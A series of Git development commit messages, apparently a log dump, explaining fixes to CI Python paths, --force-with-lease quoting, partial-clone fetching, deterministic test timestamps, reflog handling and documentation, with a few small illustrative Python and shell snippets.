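A non-empty result is the situation in which bailing out with a hint is more helpful than silently ignoring the settings.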
Signed-off-by: Drew DeVault <sir@cmpwn.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In our test suite, when 'git p4' invokes a Git command as a
subprocess, it should run the 'git' binary we are testing.
Unfortunately, this is not the case in the 'linux-clang' and
'linux-gcc' jobs on Travis CI, where 'git p4' runs the system
'/usr/bin/git' instead.
Travis CI's default Linux image includes 'pyenv', and all Python
invocations that involve PATH lookup go through 'pyenv', e.g. our
'PYTHON_PATH=$(which python3)' sets '/opt/pyenv/shims/python3' as
PYTHON_PATH, which in turn will invoke '/usr/bin/python3'. Alas, the
'pyenv' version included in this image is buggy, and prepends the
directory containing the Python binary to PATH even if that is a
system directory already in PATH near the end. Consequently, 'git p4'
in those jobs ends up with its PATH starting with '/usr/bin', and then
runs '/usr/bin/git'.
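The effect of the extra PATH entry can be reproduced with a toy lookup. The directory names below are invented for the example and `which` is a simplified stand-in for the real PATH search.

```python
def which(name, path, executables):
    """Return the first PATH entry that contains name, like a shell would."""
    for directory in path.split(":"):
        candidate = f"{directory}/{name}"
        if candidate in executables:
            return candidate
    return None


# Hypothetical layout: the build under test plus the system-wide Git.
EXECUTABLES = {"/home/ci/git/bin-wrappers/git", "/usr/bin/git"}
TEST_PATH = "/home/ci/git/bin-wrappers:/usr/local/bin:/usr/bin"
# What the buggy 'pyenv' hands to the Python process.
BUGGY_PATH = "/usr/bin:" + TEST_PATH
```

With `TEST_PATH` the lookup finds the build under test; with `BUGGY_PATH` the earlier '/usr/bin' entry wins, even though that directory was already present further down.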
So use the absolute paths '/usr/bin/python{2,3}' explicitly when
setting PYTHON_PATH in those Linux jobs to avoid the PATH lookup and
thus prevent the bogus 'pyenv' from interfering with our 'git p4' tests.
Don't bother with special-casing Travis CI: while this issue doesn't
affect the corresponding Linux jobs on GitHub Actions, both CI systems
use Ubuntu LTS-based images, so we can safely rely on these Python
paths.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The index-pack documentation explicitly states that the pack
name is derived from the sorted list of object names, but
since commit 1190a1acf8 ("pack-objects: name pack files
after trailer hash") that isn't true anymore.
Be less explicit in the docs as to what the exact output is,
and just say that it's whatever goes into the pack name.
Also update a comment on write_idx_file() since it no longer
modifies the sha1 variable (it's const now anyway), as noted
by Junio.
Fixes: 1190a1acf8 ("pack-objects: name pack files after trailer hash")
Signed-off-by: Johannes Berg <johannes@sipsolutions.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pretend_object_file() is invoked with an object that does not exist
(as is the typical case), there is no need to fetch anything from the
promisor remote, because the caller already knows what the object is
supposed to contain. Therefore, suppress the fetch. (The
OBJECT_INFO_QUICK flag is added for the same reason.)
This was noticed at $DAYJOB when "blame" was run on a file that had
uncommitted modifications.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When an object to be packed is noticed to be missing, prefetch all
to-be-packed objects in one batch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Use oid_object_info_extended() instead of oid_object_info() because a
subsequent commit needs to specify an additional flag here.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we invoke a remote transport helper and pass an option with an
argument, we quote the argument as a C-style string if necessary. This
is the case for the cas option, which implements the --force-with-lease
command-line flag, when we're passing a non-ASCII refname.
However, the remote curl helper isn't designed to parse such an
argument, meaning that if we try to use --force-with-lease with an HTTP
push and a non-ASCII refname, we get an error like this:
error: cannot parse expected object name '0000000000000000000000000000000000000000"'
Note the double quote, which get_oid has reminded us is not valid in a
hex object ID.
Even if we had been able to parse it, we would send the wrong data to
the server: we'd send an escaped ref, which would not behave as the user
wanted and might accidentally result in updating or deleting a ref we
hadn't intended.
Since we need to expect a quoted C-style string here, just check if the
first argument is a double quote, and if so, unquote it. Note that if
the refname contains a double quote, then we will have double-quoted it
already, so there is no ambiguity.
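The "unquote only if it starts with a double quote" rule might look roughly like this in Python. This is a sketch, not the helper's C code: `maybe_unquote` is a hypothetical name, only a common subset of escapes is handled, and the result is decoded as UTF-8 for readability even though refnames are really byte strings.

```python
# Escapes accepted in this sketch, mapped to the byte they stand for.
SIMPLE_ESCAPES = {
    "a": 7, "b": 8, "f": 12, "n": 10, "r": 13, "t": 9, "v": 11,
    '"': 34, "\\": 92,
}


def maybe_unquote(arg):
    """Undo C-style quoting if arg starts with a double quote."""
    if not arg.startswith('"'):
        return arg  # not quoted, use as-is
    if len(arg) < 2 or not arg.endswith('"'):
        raise ValueError("unterminated quoted string")
    body = arg[1:-1]
    out = bytearray()
    i = 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            raise ValueError("unescaped double quote inside string")
        if ch != "\\":
            out += ch.encode("utf-8")
            i += 1
        elif body[i + 1:i + 2] in SIMPLE_ESCAPES:
            out.append(SIMPLE_ESCAPES[body[i + 1]])
            i += 2
        else:
            # Otherwise expect a three-digit octal escape such as \303.
            digits = body[i + 1:i + 4]
            if (len(digits) != 3 or digits[0] not in "0123"
                    or any(d not in "01234567" for d in digits)):
                raise ValueError("bad escape sequence")
            out.append(int(digits, 8))
            i += 4
    return out.decode("utf-8")
```

A value without a leading double quote passes through untouched, so plain ASCII refnames keep working exactly as before.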
We test for this case only in the smart protocol, since the DAV-based
protocol is not capable of handling this capability. We use UTF-8
because this is nicer in our tests and friendlier to Windows, but the
code should work for all non-ASCII refs.
While we're at it, since the name of the option is now well established
and isn't going to change, let's inline it instead of using the #define
constant.
Reported-by: Frej Bjon <frej.bjon@nemit.fi>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git mv' has always complained about renaming a conflicted
file, as it cannot handle multiple index entries for one file.
However, the error message it uses has been the same as the
one for an untracked file:
fatal: not under version control, src=...
which is patently wrong. Distinguish the two cases and
add a test to make sure we produce the correct message.
Signed-off-by: Chris Torek <chris.torek@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 95c11ecc73 ("Fix error-prone fill_directory() API; make it only
return matches", 2020-04-01), we taught `fill_directory()`, or more
specifically `treat_path()`, to check against any pathspecs so that we
could simplify the callers.
But in doing so, we added a slightly-too-early return for the "excluded"
case. We end up not checking the pathspecs, meaning we return
`path_excluded` when maybe we should return `path_none`. As a result,
`git status --ignored -- pathspec` might show paths that don't actually
match "pathspec".
Move the "excluded" check down to after we've checked any pathspecs.
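The ordering problem can be shown with a reduced model in Python. Both functions are hypothetical simplifications of `treat_path()`, and `matches_pathspec` is a crude leading-directory test rather than real pathspec matching.

```python
def matches_pathspec(path, pathspec):
    """Crude stand-in for pathspec matching: exact or leading-directory."""
    if pathspec is None:
        return True
    prefix = pathspec.rstrip("/")
    return path == prefix or path.startswith(prefix + "/")


def treat_path_buggy(path, excluded, pathspec):
    if excluded:
        return "path_excluded"  # returned before the pathspec is consulted
    if not matches_pathspec(path, pathspec):
        return "path_none"
    return "path_untracked"


def treat_path_fixed(path, excluded, pathspec):
    if not matches_pathspec(path, pathspec):
        return "path_none"  # paths outside the pathspec are never reported
    if excluded:
        return "path_excluded"
    return "path_untracked"
```

For an ignored file outside the requested pathspec, the first version reports "path_excluded" while the second reports "path_none", which is the difference visible in `git status --ignored -- pathspec`.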
Reported-by: Andreas Schwab <schwab@linux-m68k.org>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Martin Ågren <martin.agren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will allow these tests to run with alternative ref backends.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When upload-pack receives a request containing "have" hashes, it (among
other things) checks if the served repository has the corresponding
objects. However, it does not do so with the
OBJECT_INFO_SKIP_FETCH_OBJECT flag, so if serving a partial clone, a
lazy fetch will be triggered first.
This was discovered at $DAYJOB when a user fetched from a partial clone
(into another partial clone - although this would also happen if the
repo to be fetched into is not a partial clone).
Therefore, whenever "have" hashes are checked for existence, pass the
OBJECT_INFO_SKIP_FETCH_OBJECT flag. Also add the OBJECT_INFO_QUICK flag
to improve performance, as it is typical that such objects do not exist
in the serving repo, and the consequences of a false negative are minor
(usually, a slightly larger pack sent).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It's useful and efficient to be able to get the size of the
contents directly without having to pipe through `wc -c`.
Also the result of the following:
`git for-each-ref --format='%(contents)' refs/heads/my-branch | wc -c`
is off by one as `git for-each-ref` appends a newline character
after the contents, which can be seen by comparing its output
with the output from `git cat-file`.
As with %(contents), %(contents:size) is silently ignored, if a
ref points to something other than a commit or a tag:
```
$ git update-ref refs/mytrees/first HEAD^{tree}
$ git for-each-ref --format='%(contents)' refs/mytrees/first
$ git for-each-ref --format='%(contents:size)' refs/mytrees/first
```
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
has_dir_name() has some optimizations for the case where entries are
added to an index in the correct order. They kick in if the new entry
sorts after the last one. One of them exits early if the last entry has
a longer name than the directory of the new entry. Here's its comment:
	/*
	 * The directory prefix lines up with part of
	 * a longer file or directory name, but sorts
	 * after it, so this sub-directory cannot
	 * collide with a file.
	 *
	 * last: xxx/yy-file (because '-' sorts before '/')
	 * this: xxx/yy/abc
	 */
However, a file named xxx/yy would be sorted before xxx/yy-file because
'-' sorts after NUL, so the length check against the last entry is not
sufficient to rule out a collision. Remove it.
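The ordering problem can be reproduced with plain byte strings. This is
only a model of the index order (Python's bytes comparison, where a name
sorts before any longer name it is a prefix of), and the helper name is
hypothetical:

```python
# A file "xxx/yy", a longer file "xxx/yy-file", and a new entry whose
# directory prefix is "xxx/yy".
names = [b"xxx/yy/abc", b"xxx/yy-file", b"xxx/yy"]
ordered = sorted(names)
print(ordered)

def length_check_says_no_collision(last, directory):
    # Models the removed shortcut: the last entry is longer than the
    # directory of the new entry, so a collision was assumed impossible.
    return len(last) > len(directory)

new_entry = b"xxx/yy/abc"
directory = new_entry.rsplit(b"/", 1)[0]
last = ordered[ordered.index(new_entry) - 1]

shortcut_taken = length_check_says_no_collision(last, directory)
collision_exists = directory in names
print(shortcut_taken, collision_exists)
```

Both values come out true: the shortcut fires even though a file with the
same name as the directory sits earlier in the index.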
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Suggested-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We made the mistake in the past of respecting extensions.* even when the
repository format version was set to 0. This is bad because forgetting
to bump the repository version means that older versions of Git (which
do not know about our extensions) won't complain. I.e., it's not a
problem in itself, but it means your repository is in a state which does
not give you the protection you think you're getting from older
versions.
For compatibility reasons, we are stuck with that decision for existing
extensions. However, we'd prefer not to extend the damage further. We
can do that by catching any newly-added extensions and complaining about
the repository format.
Note that this is a pretty heavy hammer: we'll refuse to work with the
repository at all. A lesser option would be to ignore (possibly with a
warning) any new extensions. But because of the way the extensions are
handled, that puts the burden on each new extension that is added to
remember to "undo" itself (because they are handled before we know
for sure whether we are in a v1 repo or not, since we don't insist on a
particular ordering of config entries).
So one option would be to rewrite that handling to record any new
extensions (and their values) during the config parse, and only
afterwards act on them if we're in a v1 repository. But
I'm not sure if it's worth the trouble:
- ignoring extensions is likely to end up with broken results anyway
(e.g., ignoring a proposed objectformat extension means parsing any
object data is likely to encounter errors)
- this is a sign that whatever tool wrote the extension field is
broken. We may be better off notifying immediately and forcefully so
that such tools don't even appear to work accidentally.
The only downside is that fixing the situation is a little tricky,
because programs like "git config" won't want to work with the
repository. But:
git config --file=.git/config core.repositoryformatversion 1
should still suffice.
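The rule can be sketched as follows. This is a simplified Python model, not
Git's setup code: the set of grandfathered extension names, the function
name and the error text are all assumptions made for illustration, and the
handling of unknown extensions in v1 repositories is left out.

```python
# Illustrative only: extensions that keep working with version 0 for
# compatibility. The names here are assumptions, not Git's real list.
GRANDFATHERED_V0 = {"preciousobjects", "partialclone"}

def check_repository_format(version, extensions):
    """Return None if the repository is usable, else an error string."""
    if version >= 1:
        return None
    newer = sorted(e for e in extensions if e not in GRANDFATHERED_V0)
    if newer:
        return "version 0 repository uses newer extensions: " + ", ".join(newer)
    return None

print(check_repository_format(0, ["partialclone"]))
print(check_repository_format(0, ["objectformat"]))
print(check_repository_format(1, ["objectformat"]))
```

Only the middle call reports an error, which matches the idea of refusing
a v0 repository that carries a newly-added extension.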
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Completion for the diff command was added in fd0bc17557, but the
show command, which also supports --color-moved[-ws], was missed.
This suffers from the very same problem [1] as the referenced
commit: no comma-separated list completion for --color-moved-ws.
[1]: https://github.com/scop/bash-completion/issues/240
Signed-off-by: Michal Privoznik <mprivozn@redhat.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
An earlier "fix" to this script gave up updating it not to rely on
the current time because we cannot control what timestamp subversion
gives its commits. We however could solve the issue in a different
way and still use deterministic timestamps on Git commits.
One fix would be to sort the list of trees before removing duplicates,
but that loses information:
- we do care that the fetched history is in the same order
- there's a tree which appears twice in the history, and we'd want to
make sure that it's there both times
So instead, let's de-duplicate using a hash (preserving the order), and
drop only lines with identical trees and subjects (preserving the tree
which appears twice, since it has different subjects each time).
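A minimal Python sketch of that de-duplication, assuming each input line
has already been split into a (tree, subject) pair; the tree names and
subjects below are placeholders, not the ones from the test:

```python
def dedup_by_tree_and_subject(lines):
    """Drop repeated (tree, subject) pairs, keeping first-seen order."""
    seen = set()
    kept = []
    for tree, subject in lines:
        key = (tree, subject)
        if key in seen:
            continue
        seen.add(key)
        kept.append(key)
    return kept

history = [
    ("tree-1", "import"),
    ("tree-1", "import"),            # doubled commit, dropped
    ("tree-2", "change mode"),
    ("tree-2", "change mode"),       # doubled commit, dropped
    ("tree-1", "change mode back"),  # same tree as "import", kept
    ("tree-1", "change mode back"),  # doubled commit, dropped
]

for tree, subject in dedup_by_tree_and_subject(history):
    print(tree, subject)
```

Keying on the tree alone would have dropped the last distinct entry, which
is the information loss described above.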
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Eric Wong <e@80x24.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We always set the name and email for committer and author idents to make
the test suite more deterministic, but not timestamps. Many scripts use
test_tick to get consistent and sensibly incrementing timestamps as they
create commits. But other scripts don't particularly care about the
timestamp, and are happy to use whatever the current system time is.
This non-determinism can be annoying:
- when debugging a test, comparing results between two runs can be
difficult, because the commit ids change
- this can sometimes cause tests to be racy. E.g., traversal order
depends on timestamp order. Even in a well-ordered set of commands,
because our timestamp granularity is one second, two commits might
sometimes have the same timestamp and sometimes differ.
Let's set a default timestamp for all scripts to use. Any that use
test_tick already will be unaffected (because their first test_tick call
will overwrite our default), but it will make things a bit more
deterministic for those that don't.
We should be able to choose any time we want here. I picked this one
because:
- it differs from the initial test_tick default, which may make it
easier to distinguish when debugging tests. I picked "April 1st
13:14:15" in the hope that it might stand out.
- it's slightly before the test_tick default. Some tests create some
commits before the first call to test_tick, so using older
timestamps for those makes sense chronologically. Note that this
isn't how things currently work (where system times are usually more
recent than test_tick), but that also allows us to flush out a few
hidden timestamp dependencies (like the one recently fixed in
t5539).
- we could likewise pick any timezone we want. Choosing +0000 would
have required fixing up fewer tests, but we're more likely to turn
up interesting cases by not matching $TZ exactly. And since
test_tick already checks "-0700", let's try something in the "+"
zone range for variety.
It's possible that the non-deterministic times could help flush out bugs
(e.g., if something broke when the clock flipped over to 2021, our test
suite would let us know). But historically that hasn't been the case;
all time-dependent outcomes we've seen turned out to be accidentally
flaky tests (which we fixed by using test_tick). If we do want to cover
handling the current time, we should dedicate one script to doing so,
and have it unset GIT_COMMITTER_DATE explicitly.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The early part of t9100 creates an unusual "doubled" history in the
"git-svn" ref. When we get to t9100.17, it looks like this:
$ git log --oneline --graph git-svn
[...]
* efd0303 detect node change from file to directory #2
|\
* | 3e727c0 detect node change from file to directory #2
|/
* 3b00468 try a deep --rmdir with a commit
|\
* | b4832d8 try a deep --rmdir with a commit
|/
* f0d7bd5 import for git svn
Each commit we make with "git commit" is paired with one from "git svn
set-tree", with the latter as a merge of the first and its grandparent.
Later, t9100.17 wants to check that "git svn fetch" gets the same trees.
And it does, but just one copy of each. So it uses rev-list to get the
tree of each commit and pipes it to "uniq" to drop the duplicates. Our
input isn't sorted, but it will find adjacent duplicates. This works
reliably because the order of commits from rev-list always shows the
duplicates next to each other. For any one of those merges, we could
choose to show its duplicate or the grandparent first. But barring
clocks running backwards, the duplicate will always have a time equal to
or greater than the grandparent. Even if equal, we break ties by showing
the first-parent first, so the duplicates remain adjacent.
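The reliance on adjacency is easy to see in a small model of "uniq". This
Python sketch uses placeholder tree names; it only shows that duplicates
are removed when they sit next to each other and survive otherwise:

```python
from itertools import groupby

def uniq(items):
    """Collapse runs of equal adjacent items, like uniq(1) does for lines."""
    return [key for key, _ in groupby(items)]

adjacent = ["tree-A", "tree-A", "tree-B", "tree-B", "tree-C"]
interleaved = ["tree-A", "tree-B", "tree-A", "tree-B", "tree-C"]

print(uniq(adjacent))
print(uniq(interleaved))
```

The first list shrinks to three entries; the second comes back unchanged,
which is what would happen if the traversal order stopped keeping each
duplicate next to its twin.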
But this would break if the timestamps stopped moving in chronological
order. Normally we would rely on test_tick for this, but we have _two_
sources of time here:
- "git commit" creates one commit based on GIT_COMMITTER_DATE (which
respects test_tick)
- the "svn set-tree" one is based on subversion, which does not have
an easy way to specify a timestamp
So using test_tick actually breaks the test, because now the duplicates
are far in the past, and we'll show the grandparent before the
duplicate. And likewise, a proposed change to set GIT_COMMITTER_DATE in
all scripts will break it.
We _could_ fix this by sorting before removing duplicates, but
presumably it's a useful part of the test to make sure the trees appear
in the same order in both spots. Likewise, we could use something like:
perl -ne 'print unless $seen{$_}++'
to remove duplicates without impacting the order. But that doesn't work
either, because there are actually multiple (non-duplicate) commits with
the same trees (we change a file mode and then change it back). So we'd
actually have to de-duplicate the combination of subject and tree. Which
then further throws off t9100.18, which compares the tree hashes
exactly; we'd have to strip the result back down.
Since this test _isn't_ buggy, the simplest thing is to just work around
the proposed change by documenting our expectation that git-created
commits are correctly interleaved using the current time.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends - 'apply' and
'merge' - each of which supports a different set of options. In
particular the apply backend supports a number of options implemented
by 'git am' that are not implemented in the merge backend. This means
that the available options are different depending on which backend is
used which is confusing. This patch adds support for the
--ignore-whitespace option to the merge backend. This option treats
lines with only whitespace changes as unchanged and is implemented in
the merge backend by translating it to -Xignore-space-change.
Signed-off-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Regarding reflog messages:
- We expect that a reflog message consists of a single line. The
file format used by the files backend may add a LF after the
message as a delimiter, and output by commands like "git log -g"
may complete such an incomplete line by adding a LF at the end,
but philosophically, the terminating LF is not a part of the
message.
- We however allow callers of refs API to supply a random sequence
of NUL terminated bytes. We cleanse caller-supplied message by
squashing a run of whitespaces into a SP, and by trimming trailing
whitespace, before storing the message. This is how we tolerate,
instead of erring out, a message with LF in it (be it at the end,
in the middle, or both).
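The cleansing rule described above can be sketched in a few lines of
Python. This is an illustration of the rule as stated (squash whitespace
runs into one SP, then trim the end), not the C implementation, and the
function name is made up:

```python
import re

def cleanse_reflog_message(msg):
    """Squash each run of whitespace into one SP, then trim the end."""
    squashed = re.sub(r"[ \t\n\r\f\v]+", " ", msg)
    return squashed.rstrip(" ")

print(repr(cleanse_reflog_message("commit: fix typo\n")))
print(repr(cleanse_reflog_message("pull:  fast\n\nforward \n")))
```

Both results are single lines without a trailing LF, regardless of where
the caller put line breaks.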
Currently, the cleansing of the reflog message is done by the files
backend, before the log is written out. This is sufficient with the
current code, as that is the only backend that writes reflogs. But
new backends can be added that write reflogs, and we'd want the
resulting log message we would read out of "log -g" to be the same no
matter what backend is used, and moving the code to do so to the
generic layer is a way to do so.
An added benefit is that the "cleansing" function could be updated
later, independent from individual backends, to e.g. allow
multi-line log messages if we wanted to, and when that happens, it
would help a lot to ensure we covered all bases if the cleansing
function (which would be updated) is called from the generic layer.
Side note: I am not interested in supporting multi-line reflog
messages right at the moment (nobody is asking for it), but I
envision that instead of the "squash a run of whitespaces into a SP
and rtrim" cleansing, we can %urlencode problematic bytes in the
message *AND* append a SP at the end, when a new version of Git that
supports multi-line and/or verbatim reflog messages writes a reflog
record. The reading side can detect the presence of SP at the end
(which should have been rtrimmed out if it were written by existing
versions of Git) as a signal that decoding %urlencode recovers the
original reflog message.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Both git-bisect.sh and bisect--helper inspected the file system
directly.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adding tests for refs pointing to tree and blob shows that
we care about testing both positive ("see, my shiny new toy
does work") and negative ("and it won't do nonsensical
things when given an input it is not designed to work with")
cases.
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Let's avoid a big dense paragraph by using an unordered
list for the %(contents:XXXX) format specifiers.
While at it let's also make the following improvements:
- Let's not describe %(contents) using "complete message"
as it's not clear what an incomplete message is.
- Let's improve how the "subject" and "body" are
described.
- Let's state that "signature" is only available for
tag objects.
Suggested-by: Jeff King <peff@peff.net>
Signed-off-by: Christian Couder <chriscool@tuxfamily.org>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test for "no shallow lines after receiving ACK ready" is very
sensitive to the timestamps of the commits we create. It's looking for
the fetch negotiation to send a "ready", which in turn depends on the
order in which we traverse commits during the negotiation.
It works reliably now because the base commit "7" is created without
test_commit, and thus gets a commit time matching the current system
clock. Whereas the new commits created in this test do use test_commit,
and get the usual test_tick time from 2005. So the fetch into the
"clone" repository results in a commit graph like this (I omitted some
of the "unrelated" commits for clarity; they're all just a sequence of
test_ticks):
$ git log --graph --format='%ct %s %d'
* 1112912953 new (origin/master, origin/HEAD)
* 1594322236 7 (grafted, master)
* 1112912893 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1112912053 unrelated1 (origin/unrelated1, unrelated1)
* 1112911993 new-too (HEAD -> newnew, tag: new-too)
The important things to see are:
- "7" is way in the future compared to the other commits
- "new-too" in the fetching repo is older than "new" (and its
"unrelated" ancestors) in the shallow repo
If we change our "setup shallow clone" step to use test_tick, too (and
get rid of the dependency on the system clock), then the test will fail.
The resulting graph looks like this:
$ git log --graph --format='%ct %s %d'
* 1112913373 new (origin/master, origin/HEAD)
* 1112912353 7 (grafted, master)
* 1112913313 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1112912473 unrelated1 (origin/unrelated1, unrelated1)
* 1112912413 new-too (HEAD -> newnew, tag: new-too)
Our "new-too" is still older than "new" and "unrelated", but now "7" is
older than all of them (because it advanced test_tick, which the other
tests built on top of). In the original, we advertised "7" as the first
"have" before anything else, but now "new-too" is more recent. You'd see
the same thing in the unlikely event that the system clock was set
before our test_tick default in 2005.
Let's make the timing requirements more explicit. The important thing is
that the client advertise all of its shared commits first, before
presenting its unique "new-too" commit. We can do that and get rid of
the system clock dependency at the same time by creating all of the
shared commits around time X (using test_tick), and then creating
"new-too" with some time long before X. The resulting graph looks like
this:
$ git log --graph --format='%ct %s %d'
* 1500001380 new (origin/master, origin/HEAD)
* 1500000420 7 (grafted, master)
* 1500001320 unrelated15 (origin/unrelated15, unrelated15)
[...]
* 1500000480 unrelated1 (origin/unrelated1, unrelated1)
* 1400000060 new-too (HEAD -> newnew, tag: new-too)
That also lets us get rid of the hacky test_tick added by f0e802ca20
(t5539: update a flaky test, 2014-07-14). That was clearly dancing
around the same problem, but only addressed the relationship between
commits created in the two subshells (which did use test_tick, but
overlapped because increments of test_tick in subshells are lost). Now
that we're using consistent and well-placed times for both lines of
history, we don't have to care about a one-tick difference between the
two sides.
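The effect of the three timestamp layouts can be compared with a
deliberately simplified Python model. It reduces the client to the two
commits of interest ("7" and "new-too", with the times from the graphs
above) and assumes that commits are offered newest-first; real negotiation
does more than this.

```python
def offer_order(commit_times):
    """Names sorted by commit time, newest first (simplified model)."""
    ranked = sorted(commit_times.items(), key=lambda kv: kv[1], reverse=True)
    return [name for name, _ in ranked]

system_clock = {"7": 1594322236, "new-too": 1112911993}
all_test_tick = {"7": 1112912353, "new-too": 1112912413}
explicit_times = {"7": 1500000420, "new-too": 1400000060}

print(offer_order(system_clock))
print(offer_order(all_test_tick))
print(offer_order(explicit_times))
```

Only the middle layout puts "new-too" ahead of the shared commit, which is
the ordering that makes the test fail.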
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A few of the perl tests in t9700 ask for the author and committer ident,
and then make sure we get something sensible. For the timestamp portion,
we just match [0-9]+, because the actual value will depend on when the
test is run. However, we do require that the timezone be "+0000". This
works reliably because we set $TZ in test-lib.sh. But in preparation for
changing the default timezone, let's be a bit more flexible. We don't
actually care about the exact value here, just that we were able to get
a sensible output from the perl module's access methods.
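As an illustration of the looser check, here is a Python sketch. The
pattern is an assumption about what "sensible" could mean (any numeric
timestamp followed by any signed four-digit zone); it is not the
expression used in t9700, and the ident strings are examples only.

```python
import re

# Name, email, numeric timestamp, and any +hhmm / -hhmm zone.
IDENT_RE = re.compile(r"^.+ <[^>]+> [0-9]+ [+-][0-9]{4}$")

def looks_like_ident(line):
    return IDENT_RE.match(line) is not None

print(looks_like_ident("A U Thor <author@example.com> 1112911993 +0000"))
print(looks_like_ident("A U Thor <author@example.com> 1112911993 -0700"))
print(looks_like_ident("A U Thor <author@example.com> yesterday UTC"))
```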
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When using git clone with --separate-git-dir realgitdir and
realgitdir already exists, its content is destroyed.
So, make sure we don't clone into an existing non-empty directory.
When d45420c1 (clone: do not clean up directories we didn't create,
2018-01-02) tightened the clean-up procedure after a failed cloning
into an empty directory, it assumed that the existing directory
given is an empty one so it is OK to keep that directory, while
running the clean-up procedure that is designed to remove everything
in it (since there won't be any, anyway). Check and make sure that
the $GIT_DIR is empty even when cloning into an existing repository.
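The kind of check involved can be sketched in Python. The function names
and the exact policy (a missing path or an empty directory is acceptable)
are assumptions for illustration, not a transcription of what clone does:

```python
import os
import tempfile

def is_empty_dir(path):
    """True if path is a directory with no entries."""
    with os.scandir(path) as entries:
        return next(entries, None) is None

def usable_as_git_dir(path):
    """Hypothetical policy: allow a missing path or an empty directory."""
    if not os.path.exists(path):
        return True
    return os.path.isdir(path) and is_empty_dir(path)

with tempfile.TemporaryDirectory() as realgitdir:
    print(usable_as_git_dir(realgitdir))   # empty directory
    open(os.path.join(realgitdir, "precious"), "w").close()
    print(usable_as_git_dir(realgitdir))   # now non-empty
```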
Signed-off-by: Ben Wijen <ben@wijen.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The `git log` synopsis mentions `<revision range>`, and the description
of this option links to gitrevisions(7), but a nice explanation of
how a revision range can be constructed from individual commits,
optionally prefixed with `^`, also exists in `rev-list-description.txt`.
Include this description in the man page for `git log`.
Add Asciidoc 'ifdef's to `rev-list-description.txt` so that either `git
rev-list` or `git log` appears in the respective man pages.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A following commit will reuse the description of the `git rev-list`
command in the `git log` manpage.
Move this description to a separate file.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Using '{caret}' inside double quotes and immediately following with a
single quoted word does not create the desired output: '<commit1>'
appears verbatim instead of being emphasized.
Use a literal caret ('^') instead.
Also, remove the leading tabs in shell examples to bring them more in
line with the rest of the documentation.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "Specifying ranges" section does not mention explicitly that
several commits can be specified to form a range.
Add a mention to that effect.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add links to the documentation for `git rev-list` and `git diff`
instead of simply mentioning them, to make it easier for readers to reach
these documentation pages. Let's link to `git diff` as this is the
porcelain command, and the rest of the family (`diff-index`, `diff-tree` and
`diff-files`) are mentioned in the "Raw output format" section of the
`git diff` documentation.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The first two commits created in t6000 are done without test_tick,
meaning they use the current system clock. After that, we create one
with test_tick, which means it uses a deterministic time in the past.
The result of the "symleft flag bit is propagated down from tag" test
relies on the output order of commits from git-log, which in turn
depends on these timestamps. So this test is technically dependent on
the system clock time, though in practice it would only matter if your
system clock was set before test_tick's default time (which is in 2005).
However, let's use test_tick consistently for those early commits (and
update the expected output to match). This makes the test deterministic,
which is in turn easier to reason about and debug.
Note that there's also a fourth commit here, and it does not use
test_tick. It does have a deterministic timestamp because of the prior
use of test_tick in the script, but it will always be the same time as
the third commit. Let's use test_tick here, too, for consistency. The
matching timestamps between the third and fourth commit are not an
important part of the test.
